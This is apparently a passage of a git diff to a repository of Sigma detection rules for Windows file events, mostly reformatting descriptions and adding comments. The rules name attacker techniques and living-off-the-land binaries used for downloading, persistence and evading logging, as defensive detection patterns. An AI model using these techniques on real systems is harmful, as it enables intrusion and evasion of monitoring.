https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml - \powershell.exe - \pwsh.exe - \sh.exe @@ -37,9 +36,10 @@ detection: - \certutil.exe - \forfiles.exe - \mshta.exe + # - '\rundll32.exe' # Potential FP - \schtasks.exe - \scriptrunner.exe - - \wmic.exe + - \wmic.exe # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ TargetFilename|contains: - C:\PerfLogs\ - C:\Users\Public\ diff --git a/sigma/sysmon/file/file_event/file_event_win_shell_write_susp_files_extensions.yml b/sigma/sysmon/file/file_event/file_event_win_shell_write_susp_files_extensions.yml index b13174750..c9f529824 100644 --- a/sigma/sysmon/file/file_event/file_event_win_shell_write_susp_files_extensions.yml +++ b/sigma/sysmon/file/file_event/file_event_win_shell_write_susp_files_extensions.yml @@ -1,8 +1,8 @@ title: Windows Binaries Write Suspicious Extensions id: b8fd0e93-ff58-4cbd-8f48-1c114e342e62 related: - - id: 1277f594-a7d1-4f28-a2d3-73af5cbeab43 - type: derived + - id: 1277f594-a7d1-4f28-a2d3-73af5cbeab43 + type: derived status: experimental description: Detects Windows executables that writes files with suspicious extensions references: diff --git a/sigma/sysmon/file/file_event/file_event_win_startup_folder_file_write.yml b/sigma/sysmon/file/file_event/file_event_win_startup_folder_file_write.yml index 5f0629eb9..68db522e9 100644 --- a/sigma/sysmon/file/file_event/file_event_win_startup_folder_file_write.yml +++ b/sigma/sysmon/file/file_event/file_event_win_startup_folder_file_write.yml @@ -1,11 +1,10 @@ title: Startup Folder File Write id: 2aa0a6b4-a865-495b-ab51-c28249537b75 related: - - id: 28208707-fe31-437f-9a7f-4b1108b94d2e - type: similar + - id: 28208707-fe31-437f-9a7f-4b1108b94d2e + type: similar status: test -description: A General detection for files being created in the Windows startup directory. - This could be an indicator of persistence. +description: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/12 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md @@ -26,12 +25,10 @@ detection: selection: TargetFilename|contains: \Microsoft\Windows\Start Menu\Programs\StartUp filter_update: - - Image: C:\Windows\System32\wuauclt.exe - - TargetFilename|startswith: C:\$WINDOWS.~BT\NewOS\ + - Image: C:\Windows\System32\wuauclt.exe + - TargetFilename|startswith: C:\$WINDOWS.~BT\NewOS\ condition: file_event and (selection and not filter_update) falsepositives: - - FP could be caused by legitimate application writing shortcuts for example. - This folder should always be inspected to make sure that all the files in - there are legitimate + - FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate level: medium ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_default_gpo_dir_write.yml b/sigma/sysmon/file/file_event/file_event_win_susp_default_gpo_dir_write.yml index a7b84e24f..2fe206ca4 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_default_gpo_dir_write.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_default_gpo_dir_write.yml @@ -1,8 +1,7 @@ title: Suspicious Files in Default GPO Folder id: 5f87308a-0a5b-4623-ae15-d8fa1809bc60 status: test -description: Detects the creation of copy of suspicious files (EXE/DLL) to the default - GPO storage folder +description: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder references: - https://redcanary.com/blog/intelligence-insights-november-2021/ author: elhoim diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_desktop_ini.yml b/sigma/sysmon/file/file_event/file_event_win_susp_desktop_ini.yml index f9d0117f7..18aacda5e 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_desktop_ini.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_desktop_ini.yml @@ -1,9 +1,7 @@ title: Suspicious desktop.ini Action id: 81315b50-6b60-4d8f-9928-3466e1022515 status: test -description: Detects unusual processes accessing desktop.ini, which can be leveraged - to alter how Explorer displays a folder's content (i.e. renaming files) without - changing them on disk. +description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. references: - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO) diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml b/sigma/sysmon/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml index d9b5058ef..d710b3f09 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml @@ -1,8 +1,7 @@ title: Suspicious Desktopimgdownldr Target File id: fc4f4817-0c53-4683-a4ee-b17a64bc1039 status: test -description: Detects a suspicious Microsoft desktopimgdownldr file creation that stores - a file to a suspicious location or contains a file with a suspicious extension +description: Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension references: - https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ - https://twitter.com/SBousseaden/status/1278977301745741825 @@ -35,7 +34,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_diagcab.yml b/sigma/sysmon/file/file_event/file_event_win_susp_diagcab.yml index d1301fffd..4c9e22f6a 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_diagcab.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_diagcab.yml @@ -1,8 +1,7 @@ title: Creation of a Diagcab id: 3d0ed417-3d94-4963-a562-4a92c940656a status: test -description: Detects the creation of diagcab file, which could be caused by some legitimate - installer or is a sign of exploitation (review the filename and its location) +description: Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location) references: - https://threadreaderapp.com/thread/1533879688141086720.html author: frack113 diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_double_extension.yml b/sigma/sysmon/file/file_event/file_event_win_susp_double_extension.yml index b550bcd0c..58ef89b25 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_double_extension.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_double_extension.yml @@ -1,14 +1,12 @@ title: Suspicious Double Extension Files id: b4926b47-a9d7-434c-b3a0-adc3fa0bd13e related: - - id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8 - type: derived - - id: 3215aa19-f060-4332-86d5-5602511f3ca8 - type: similar + - id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8 + type: derived + - id: 3215aa19-f060-4332-86d5-5602511f3ca8 + type: similar status: test -description: Detects dropped files with double extensions, which is often used by - malware as a method to abuse the fact that Windows hide default extensions by - default. +description: Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default. references: - https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/ - https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations @@ -33,6 +31,7 @@ detection: TargetFilename|endswith: - .exe - .iso + # - '.lnk' # legitimate links can happen just anywhere - .rar - .zip TargetFilename|contains: @@ -48,6 +47,11 @@ detection: TargetFilename|endswith: - .rar.exe - .zip.exe + # Note: If you wanna keep using the ".lnk" extension. You might uncomment this filter and add additional locations + # filter_main_lnk: + # TargetFilename|contains: + # - '\AppData\Roaming\Microsoft\Office\Recent\' + # - '\AppData\Roaming\Microsoft\Windows\Recent\' condition: file_event and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_exchange_aspx_write.yml b/sigma/sysmon/file/file_event/file_event_win_susp_exchange_aspx_write.yml index abcfc9257..67b8be2e4 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_exchange_aspx_write.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_exchange_aspx_write.yml @@ -1,9 +1,7 @@ title: Suspicious MSExchangeMailboxReplication ASPX Write id: 7280c9f3-a5af-45d0-916a-bc01cb4151c9 status: test -description: Detects suspicious activity in which the MSExchangeMailboxReplication - process writes .asp and .apsx files to disk, which could be a sign of ProxyShell - exploitation +description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation references: - https://redcanary.com/blog/blackbyte-ransomware/ author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_executable_creation.yml b/sigma/sysmon/file/file_event/file_event_win_susp_executable_creation.yml index 1b6d6df5d..9a9c9e14e 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_executable_creation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_executable_creation.yml @@ -1,9 +1,7 @@ title: Suspicious Executable File Creation id: 74babdd6-a758-4549-9632-26535279e654 status: test -description: Detect creation of suspicious executable file name. Some strings look - for suspicious file extensions, others look for filenames that exploit unquoted - service paths. +description: Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths. references: - https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae - https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/ diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_get_variable.yml b/sigma/sysmon/file/file_event/file_event_win_susp_get_variable.yml index 53d45b844..93dce1e65 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_get_variable.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_get_variable.yml @@ -1,15 +1,10 @@ title: Suspicious Get-Variable.exe Creation id: 0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b status: test -description: 'Get-Variable is a valid PowerShell cmdlet - +description: | + Get-Variable is a valid PowerShell cmdlet WindowsApps is by default in the path where PowerShell is executed. - - So when the Get-Variable command is issued on PowerShell execution, the system - first looks for the Get-Variable executable in the path and executes the malicious - binary instead of looking for the PowerShell cmdlet. - - ' + So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet. references: - https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/ - https://www.joesandbox.com/analysis/465533/0/html diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml b/sigma/sysmon/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml index 68fdc0c7a..7982ac593 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml @@ -1,14 +1,11 @@ title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream id: a8f866e1-bdd4-425e-a27a-37619238d9c7 related: - - id: 0900463c-b33b-49a8-be1d-552a3b553dae - type: similar + - id: 0900463c-b33b-49a8-be1d-552a3b553dae + type: similar status: experimental -description: 'Detects the creation of hidden file/folder with the "::$index_allocation" - stream. Which can be used as a technique to prevent access to folder and files - from tooling such as "explorer.exe" and "powershell.exe" - - ' +description: | + Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe" references: - https://twitter.com/pfiatde/status/1681977680688738305 - https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/ @@ -29,6 +26,7 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: + # Note: Both Sysmon and ETW are unable to log the presence of such streams in the CommandLine. But EDRs such as Crowdstrike are able to use e.g. CMD console history. Users are advised to test this before usage TargetFilename|contains: ::$index_allocation condition: file_event and selection falsepositives: diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_homoglyph_filename.yml b/sigma/sysmon/file/file_event/file_event_win_susp_homoglyph_filename.yml index 30daba719..8a6e94fb3 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_homoglyph_filename.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_homoglyph_filename.yml @@ -1,16 +1,10 @@ title: Potential Homoglyph Attack Using Lookalike Characters in Filename id: 4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6 status: experimental -description: 'Detects the presence of unicode characters which are homoglyphs, or - identical in appearance, to ASCII letter characters. - - This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs - are included; these are characters that - - are indistinguishable from ASCII characters and thus may make excellent candidates - for homoglyph attack characters. - - ' +description: | + Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. + This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that + are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. references: - https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish - http://www.irongeek.com/homoglyph-attack-generator.php @@ -20,6 +14,7 @@ tags: - attack.defense_evasion - attack.t1036 - attack.t1036.003 + # - attack.t1036.008 - sysmon logsource: category: file_event @@ -30,59 +25,58 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_upper: TargetFilename|contains: - - "\u0410" - - "\u0412" - - "\u0415" - - "\u041A" - - "\u041C" - - "\u041D" - - "\u041E" - - "\u0420" - - "\u0421" - - "\u0422" - - "\u0425" - - "\u0405" - - "\u0406" - - "\u0408" - - "\u04AE" - - "\u04C0" - - "\u050C" - - "\u051A" - - "\u051C" - - "\u0391" - - "\u0392" - - "\u0395" - - "\u0396" - - "\u0397" - - "\u0399" - - "\u039A" - - "\u039C" - - "\u039D" - - "\u039F" - - "\u03A1" - - "\u03A4" - - "\u03A5" - - "\u03A7" + - А # А/A + - В # В/B + - Е # Е/E + - К # К/K + - М # М/M + - Н # Н/H + - О # О/O + - Р # Р/P + - С # С/C + - Т # Т/T + - Х # Х/X + - Ѕ # Ѕ/S + - І # І/I + - Ј # Ј/J + - Ү # Ү/Y + - Ӏ # Ӏ/I + - Ԍ # Ԍ/G + - Ԛ # Ԛ/Q + - Ԝ # Ԝ/W + - Α # Α/A + - Β # Β/B + - Ε # Ε/E + - Ζ # Ζ/Z + - Η # Η/H + - Ι # Ι/I + - Κ # Κ/K + - Μ # Μ/M + - Ν # Ν/N + - Ο # Ο/O + - Ρ # Ρ/P + - Τ # Τ/T + - Υ # Υ/Y + - Χ # Χ/X selection_lower: TargetFilename|contains: - - "\u0430" - - "\u0435" - - "\u043E" - - "\u0440" - - "\u0441" - - "\u0445" - - "\u0455" - - "\u0456" - - "\u04CF" - - "\u0458" - - "\u04BB" - - "\u0501" - - "\u051B" - - "\u051D" - - "\u03BF" + - а # а/a + - е # е/e + - о # о/o + - р # р/p + - с # с/c + - х # х/x + - ѕ # ѕ/s + - і # і/i + - ӏ # ӏ/l + - ј # ј/j + - һ # һ/h + - ԁ # ԁ/d + - ԛ # ԛ/q + - ԝ # ԝ/w + - ο # ο/o condition: file_event and (1 of selection_*) falsepositives: - - File names with legitimate Cyrillic text. Will likely require tuning (or not - be usable) in countries where these alphabets are in use. + - File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use. level: medium ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_archive.yml b/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_archive.yml index 533bd844f..8c6ee9f60 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_archive.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_archive.yml @@ -1,8 +1,7 @@ title: Legitimate Application Dropped Archive id: 654fcc6d-840d-4844-9b07-2c3300e54a26 status: test -description: Detects programs on a Windows system that should not write an archive - to disk +description: Detects programs on a Windows system that should not write an archive to disk references: - https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326 author: frack113, Florian Roth @@ -20,6 +19,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: + # Microsoft Office Programs Dropping Executables - \winword.exe - \excel.exe - \powerpnt.exe @@ -29,12 +29,16 @@ detection: - \visio.exe - \wordpad.exe - \wordview.exe + # LOLBINs that can be used to download executables - \certutil.exe - \certoc.exe - \CertReq.exe + # - \bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env) - \Desktopimgdownldr.exe - \esentutl.exe + # - \expand.exe - \finger.exe + # Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name) - \notepad.exe - \AcroRd32.exe - \RdrCEF.exe diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_exe.yml b/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_exe.yml index 6fb182dd0..83229a783 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_exe.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_exe.yml @@ -1,8 +1,7 @@ title: Legitimate Application Dropped Executable id: f0540f7e-2db3-4432-b9e0-3965486744bc status: experimental -description: Detects programs on a Windows system that should not write executables - to disk +description: Detects programs on a Windows system that should not write executables to disk references: - https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326 author: frack113, Florian Roth (Nextron Systems) @@ -21,15 +20,20 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: + # Microsoft Office Programs Dropping Executables / Rest of the apps are covered in: c7a74c80-ba5a-486e-9974-ab9e682bc5e4 - \eqnedt32.exe - \wordpad.exe - \wordview.exe + # LOLBINs that can be used to download executables - \certutil.exe - \certoc.exe - \CertReq.exe + # - \bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env) - \Desktopimgdownldr.exe - \esentutl.exe + # - \expand.exe - \mshta.exe + # Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name) - \AcroRd32.exe - \RdrCEF.exe - \hh.exe diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_script.yml b/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_script.yml index 110c8bc4d..631034c0e 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_script.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_script.yml @@ -1,8 +1,7 @@ title: Legitimate Application Dropped Script id: 7d604714-e071-49ff-8726-edeb95a70679 status: experimental -description: Detects programs on a Windows system that should not write scripts to - disk +description: Detects programs on a Windows system that should not write scripts to disk references: - https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326 author: frack113, Florian Roth (Nextron Systems) @@ -21,15 +20,20 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: + # Microsoft Office Programs Dropping Executables / Rest of the apps are covered in: c7a74c80-ba5a-486e-9974-ab9e682bc5e4 - \eqnedt32.exe - \wordpad.exe - \wordview.exe + # LOLBINs that can be used to download executables - \certutil.exe - \certoc.exe - \CertReq.exe + # - \bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env) - \Desktopimgdownldr.exe - \esentutl.exe + # - \expand.exe - \mshta.exe + # Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name) - \AcroRd32.exe - \RdrCEF.exe - \hh.exe diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_lnk_double_extension.yml b/sigma/sysmon/file/file_event/file_event_win_susp_lnk_double_extension.yml index 63f75bc41..897d85671 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_lnk_double_extension.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_lnk_double_extension.yml @@ -1,14 +1,11 @@ title: Suspicious LNK Double Extension File Created id: 3215aa19-f060-4332-86d5-5602511f3ca8 related: - - id: b4926b47-a9d7-434c-b3a0-adc3fa0bd13e - type: derived + - id: b4926b47-a9d7-434c-b3a0-adc3fa0bd13e + type: derived status: experimental -description: 'Detects the creation of files with an "LNK" as a second extension. This - is sometimes used by malware as a method to abuse the fact that Windows hides - the "LNK" extension by default. - - ' +description: | + Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default. references: - https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/ - https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations @@ -44,6 +41,7 @@ detection: TargetFilename|contains: \AppData\Roaming\Microsoft\Windows\Recent\ filter_optional_office_recent: Image|endswith: + # Note: Some additional office application might need to be added - \excel.exe - \powerpnt.exe - \winword.exe @@ -59,7 +57,6 @@ detection: TargetFilename|contains: \AppData\Roaming\Microsoft\Word condition: file_event and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Some tuning is required for other general purpose directories of third party - apps + - Some tuning is required for other general purpose directories of third party apps level: medium ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_pfx_file_creation.yml b/sigma/sysmon/file/file_event/file_event_win_susp_pfx_file_creation.yml index 682df15fe..09545cfd4 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_pfx_file_creation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_pfx_file_creation.yml @@ -1,8 +1,7 @@ title: Suspicious PFX File Creation id: dca1b3e8-e043-4ec8-85d7-867f334b5724 status: test -description: A general detection for processes creating PFX files. This could be an - indicator of an adversary exporting a local certificate to a PFX file. +description: A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/14 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.md diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_powershell_profile.yml b/sigma/sysmon/file/file_event/file_event_win_susp_powershell_profile.yml index 223164a00..0106282cc 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_powershell_profile.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_powershell_profile.yml @@ -1,8 +1,7 @@ title: PowerShell Profile Modification id: b5b78988-486d-4a80-b991-930eff3ff8bf status: test -description: Detects the creation or modification of a powershell profile which could - indicate suspicious activity as the profile can be used as a mean of persistence +description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence references: - https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/ - https://persistence-info.github.io/Data/powershellprofile.html diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml b/sigma/sysmon/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml index cbd46f715..d9b96550e 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml @@ -1,14 +1,9 @@ title: Suspicious PROCEXP152.sys File Created In TMP id: 3da70954-0f2c-4103-adff-b7440368f50e status: test -description: 'Detects the creation of the PROCEXP152.sys file in the application-data - local temporary folder. - - This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) - or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses - KDU. - - ' +description: | + Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. + This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU. references: - https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/ author: xknow (@xknow_infosec), xorxes (@xor_xes) @@ -36,8 +31,6 @@ detection: - \procmon.exe condition: file_event and (selection and not filter) falsepositives: - - Other legimate tools using this driver and filename (like Sysinternals). Note - - Clever attackers may easily bypass this detection by just renaming the driver - filename. Therefore just Medium-level and don't rely on it. + - Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it. level: medium ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml b/sigma/sysmon/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml index 60169f68f..ae6e3a929 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml @@ -1,11 +1,10 @@ title: Suspicious File Creation Activity From Fake Recycle.Bin Folder id: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca related: - - id: 5ce0f04e-3efc-42af-839d-5b3a543b76c0 - type: derived + - id: 5ce0f04e-3efc-42af-839d-5b3a543b76c0 + type: derived status: experimental -description: Detects file write event from/to a fake recycle bin folder that is often - used as a staging directory for malware +description: Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware references: - https://www.mandiant.com/resources/blog/infected-usb-steal-secrets - https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/ @@ -24,12 +23,14 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|contains: - - RECYCLERS.BIN\ - - RECYCLER.BIN\ - - TargetFilename|contains: - - RECYCLERS.BIN\ - - RECYCLER.BIN\ + - Image|contains: + # e.g. C:\$RECYCLER.BIN + - RECYCLERS.BIN\ + - RECYCLER.BIN\ + - TargetFilename|contains: + # e.g. C:\$RECYCLER.BIN + - RECYCLERS.BIN\ + - RECYCLER.BIN\ condition: file_event and selection falsepositives: - Unknown diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml b/sigma/sysmon/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml index 50c36bfba..df06a8671 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml @@ -1,8 +1,7 @@ title: Drop Binaries Into Spool Drivers Color Folder id: ce7066a6-508a-42d3-995b-2952c65dc2ce status: test -description: Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" - as seen in the blog referenced below +description: Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below references: - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_startup_folder_persistence.yml b/sigma/sysmon/file/file_event/file_event_win_susp_startup_folder_persistence.yml index f35fefe7b..5fa87bc66 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_startup_folder_persistence.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_startup_folder_persistence.yml @@ -1,11 +1,10 @@ title: Suspicious Startup Folder Persistence id: 28208707-fe31-437f-9a7f-4b1108b94d2e related: - - id: 2aa0a6b4-a865-495b-ab51-c28249537b75 - type: similar + - id: 2aa0a6b4-a865-495b-ab51-c28249537b75 + type: similar status: test -description: Detects when a file with a suspicious extension is created in the startup - folder +description: Detects when a file with a suspicious extension is created in the startup folder references: - https://github.com/last-byte/PersistenceSniper author: Nasreddine Bencherchali (Nextron Systems) @@ -25,6 +24,7 @@ detection: selection: TargetFilename|contains: \Windows\Start Menu\Programs\Startup\ TargetFilename|endswith: + # Add or remove suspicious extensions according to your env needs - .vbs - .vbe - .bat diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_system_interactive_powershell.yml b/sigma/sysmon/file/file_event/file_event_win_susp_system_interactive_powershell.yml index 192a9b816..6402dcc06 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_system_interactive_powershell.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_system_interactive_powershell.yml @@ -1,8 +1,7 @@ title: Suspicious Interactive PowerShell as SYSTEM id: 5b40a734-99b6-4b98-a1d0-1cea51a08ab2 status: test -description: Detects the creation of files that indicator an interactive use of PowerShell - in the SYSTEM user context +description: Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context references: - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_task_write.yml b/sigma/sysmon/file/file_event/file_event_win_susp_task_write.yml index c6cb67940..eaa1ad1d5 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_task_write.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_task_write.yml @@ -1,8 +1,7 @@ title: Suspicious Scheduled Task Write to System32 Tasks id: 80e1f67a-4596-4351-98f5-a9c3efabac95 status: test -description: Detects the creation of tasks from processes executed from suspicious - locations +description: Detects the creation of tasks from processes executed from suspicious locations references: - Internal Research author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_vscode_powershell_profile.yml b/sigma/sysmon/file/file_event/file_event_win_susp_vscode_powershell_profile.yml index f214f9167..c715e550c 100644 --- 